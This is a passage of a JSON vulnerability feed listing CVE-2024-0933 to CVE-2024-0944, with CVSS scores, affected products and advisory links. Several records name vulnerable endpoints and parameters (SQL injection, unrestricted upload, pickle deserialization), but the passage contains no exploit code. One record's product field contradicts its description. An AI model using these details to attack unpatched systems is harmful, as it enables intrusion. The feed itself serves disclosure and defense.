} ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0933", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-434" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://docs.qq.com/doc/DYnNWeHdTVXZqZURH", "name" : "https://docs.qq.com/doc/DYnNWeHdTVXZqZURH", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://docs.qq.com/doc/DYnNWeHdTVXZqZURH", "name" : "https://docs.qq.com/doc/DYnNWeHdTVXZqZURH", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252140", "name" : "https://vuldb.com/?ctiid.252140", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252140", "name" : "https://vuldb.com/?ctiid.252140", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252140", "name" : "https://vuldb.com/?id.252140", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252140", "name" : "https://vuldb.com/?id.252140", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Niushop B2B2C V5 and classified as critical. Affected by this issue is some unknown functionality of the file \\app\\model\\Upload.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252140. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:niushop:b2b2c_multi-business:5.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0935", "ASSIGNER" : "3DS.Information-Security@3ds.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-532" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.3ds.com/vulnerability/advisories", "name" : "https://www.3ds.com/vulnerability/advisories", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.3ds.com/vulnerability/advisories", "name" : "https://www.3ds.com/vulnerability/advisories", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Insertion of Sensitive Information into Log File vulnerabilities are affecting DELMIA Apriso Release 2019 through Release 2024" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:3ds:delmia_apriso:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2019", "versionEndIncluding" : "2024", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-01T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0936", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-502" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/bayuncao/vul-cve-5", "name" : "https://github.com/bayuncao/vul-cve-5", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-5", "name" : "https://github.com/bayuncao/vul-cve-5", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-5/blob/main/poc.py", "name" : "https://github.com/bayuncao/vul-cve-5/blob/main/poc.py", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-5/blob/main/poc.py", "name" : "https://github.com/bayuncao/vul-cve-5/blob/main/poc.py", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252181", "name" : "https://vuldb.com/?ctiid.252181", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252181", "name" : "https://vuldb.com/?ctiid.252181", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252181", "name" : "https://vuldb.com/?id.252181", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252181", "name" : "https://vuldb.com/?id.252181", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in van_der_Schaar LAB TemporAI 0.0.3. Affected by this vulnerability is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252181 was assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:vanderschaarlab:temporai:0.0.3:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0937", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-502" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/bayuncao/vul-cve-6", "name" : "https://github.com/bayuncao/vul-cve-6", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-6", "name" : "https://github.com/bayuncao/vul-cve-6", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-6/blob/main/poc.py", "name" : "https://github.com/bayuncao/vul-cve-6/blob/main/poc.py", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/bayuncao/vul-cve-6/blob/main/poc.py", "name" : "https://github.com/bayuncao/vul-cve-6/blob/main/poc.py", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.252182", "name" : "https://vuldb.com/?ctiid.252182", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252182", "name" : "https://vuldb.com/?ctiid.252182", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252182", "name" : "https://vuldb.com/?id.252182", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252182", "name" : "https://vuldb.com/?id.252182", "refsource" : "", "tags" : [ "Permissions Required" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in van_der_Schaar LAB synthcity 0.2.9. Affected by this issue is the function load_from_file of the component PKL File Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early and confirmed immediately the existence of the issue. A patch is planned to be released in February 2024." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:vanderschaarlab:temporai:0.2.9:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T18:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0938", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/Yu1e/vuls/blob/main/SQL%20injection%20vulnerability%20exists%20in%20Tongda%20OA.md", "name" : "https://github.com/Yu1e/vuls/blob/main/SQL%20injection%20vulnerability%20exists%20in%20Tongda%20OA.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/Yu1e/vuls/blob/main/SQL%20injection%20vulnerability%20exists%20in%20Tongda%20OA.md", "name" : "https://github.com/Yu1e/vuls/blob/main/SQL%20injection%20vulnerability%20exists%20in%20Tongda%20OA.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252183", "name" : "https://vuldb.com/?ctiid.252183", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252183", "name" : "https://vuldb.com/?ctiid.252183", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252183", "name" : "https://vuldb.com/?id.252183", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252183", "name" : "https://vuldb.com/?id.252183", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file /general/email/inbox/delete_webmail.php. The manipulation of the argument WEBBODY_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252183. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tongda2000:office_anywhere:*:*:*:*:*:*:*:*", "versionStartIncluding" : "11.0", "versionEndExcluding" : "11.10", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T18:15Z", "lastModifiedDate" : "2025-03-19T15:40Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0939", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/Yu1e/vuls/blob/main/an%20arbitrary%20file%20upload%20vulnerability%20in%20BaiZhuo%20Networks%20Smart%20S210%20multi-service%20security%20gateway%20intelligent%20management%20platform.md", "name" : "https://github.com/Yu1e/vuls/blob/main/an%20arbitrary%20file%20upload%20vulnerability%20in%20BaiZhuo%20Networks%20Smart%20S210%20multi-service%20security%20gateway%20intelligent%20management%20platform.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/Yu1e/vuls/blob/main/an%20arbitrary%20file%20upload%20vulnerability%20in%20BaiZhuo%20Networks%20Smart%20S210%20multi-service%20security%20gateway%20intelligent%20management%20platform.md", "name" : "https://github.com/Yu1e/vuls/blob/main/an%20arbitrary%20file%20upload%20vulnerability%20in%20BaiZhuo%20Networks%20Smart%20S210%20multi-service%20security%20gateway%20intelligent%20management%20platform.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252184", "name" : "VDB-252184 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252184", "name" : "VDB-252184 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252184", "name" : "VDB-252184 | Byzoro Smart S210 Management Platform uploadfile.php unrestricted upload", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252184", "name" : "VDB-252184 | Byzoro Smart S210 Management Platform uploadfile.php unrestricted upload", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.269268", "name" : "Submit #269268 | Beijing Baizhuo Network Technology Co., Ltd. Smart S210 multi-service security gateway intelligent management platform Smart S210 arbitrary file upload vulnerability", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.269268", "name" : "Submit #269268 | Beijing Baizhuo Network Technology Co., Ltd. Smart S210 multi-service security gateway intelligent management platform Smart S210 arbitrary file upload vulnerability", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Byzoro Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:byzoro:smart_s210_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2024-01-17", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:byzoro:smart_s210:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0941", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/red0-ha1yu/warehouse/blob/main/novel-plus_sqlinject2.md", "name" : "https://github.com/red0-ha1yu/warehouse/blob/main/novel-plus_sqlinject2.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/red0-ha1yu/warehouse/blob/main/novel-plus_sqlinject2.md", "name" : "https://github.com/red0-ha1yu/warehouse/blob/main/novel-plus_sqlinject2.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252185", "name" : "https://vuldb.com/?ctiid.252185", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?ctiid.252185", "name" : "https://vuldb.com/?ctiid.252185", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.252185", "name" : "https://vuldb.com/?id.252185", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252185", "name" : "https://vuldb.com/?id.252185", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Novel-Plus 4.3.0-RC1 and classified as critical. This issue affects some unknown processing of the file /novel/bookComment/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-252185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:xxyopen:novel-plus:4.3.0:rc1:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T19:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0942", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1oWAGbmDtHDIUN1WSRAh4ZnuzHOuvTU4T/view?usp=sharing", "name" : "https://drive.google.com/file/d/1oWAGbmDtHDIUN1WSRAh4ZnuzHOuvTU4T/view?usp=sharing", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1oWAGbmDtHDIUN1WSRAh4ZnuzHOuvTU4T/view?usp=sharing", "name" : "https://drive.google.com/file/d/1oWAGbmDtHDIUN1WSRAh4ZnuzHOuvTU4T/view?usp=sharing", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252186", "name" : "VDB-252186 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252186", "name" : "VDB-252186 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252186", "name" : "VDB-252186 | Totolink N200RE V5 cstecgi.cgi session expiration", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252186", "name" : "VDB-252186 | Totolink N200RE V5 cstecgi.cgi session expiration", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.269679", "name" : "Submit #269679 | Totolink N200RE_V5 V9.3.5u.6255_B20211224 Insufficient Session Expiration", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.269679", "name" : "Submit #269679 | Totolink N200RE_V5 V9.3.5u.6255_B20211224 Insufficient Session Expiration", "refsource" : "", "tags" : [ ] }, { "url" : "https://youtu.be/b0tU2CiLbnU", "name" : "https://youtu.be/b0tU2CiLbnU", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://youtu.be/b0tU2CiLbnU", "name" : "https://youtu.be/b0tU2CiLbnU", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n200re-v5_firmware:9.3.5u.6255_b20211224:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n200re-v5:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-26T20:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0943", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1OBs4kc1KvbqrMhQHs54WtwxxxiBoI0hL/view?usp=sharing", "name" : "https://drive.google.com/file/d/1OBs4kc1KvbqrMhQHs54WtwxxxiBoI0hL/view?usp=sharing", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1OBs4kc1KvbqrMhQHs54WtwxxxiBoI0hL/view?usp=sharing", "name" : "https://drive.google.com/file/d/1OBs4kc1KvbqrMhQHs54WtwxxxiBoI0hL/view?usp=sharing", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252187", "name" : "VDB-252187 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252187", "name" : "VDB-252187 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252187", "name" : "VDB-252187 | Totolink N350RT cstecgi.cgi session expiration", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252187", "name" : "VDB-252187 | Totolink N350RT cstecgi.cgi session expiration", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.269680", "name" : "Submit #269680 | Totolink N350RT V9.3.5u.6255 Insufficient Session Expiration", "refsource" : "", "tags" : [ ] }, { "url" : "https://vuldb.com/?submit.269680", "name" : "Submit #269680 | Totolink N350RT V9.3.5u.6255 Insufficient Session Expiration", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:totolink:n350rt_firmware:9.3.5u.6255:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:totolink:n350rt:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 5.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 1.4 } }, "publishedDate" : "2024-01-26T20:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0944", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1YPisSnxM5CwSLKFgs9w5k5MtNUgiijVo/view?usp=sharing", "name" : "https://drive.google.com/file/d/1YPisSnxM5CwSLKFgs9w5k5MtNUgiijVo/view?usp=sharing", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://drive.google.com/file/d/1YPisSnxM5CwSLKFgs9w5k5MtNUgiijVo/view?usp=sharing", "name" : "https://drive.google.com/file/d/1YPisSnxM5CwSLKFgs9w5k5MtNUgiijVo/view?usp=sharing", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252188", "name" : "VDB-252188 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252188", "name" : "VDB-252188 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252188", "name" : "VDB-252188 | Totolink T8 cstecgi.cgi session expiration", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252188", "name" : "VDB-252188 | Totolink T8 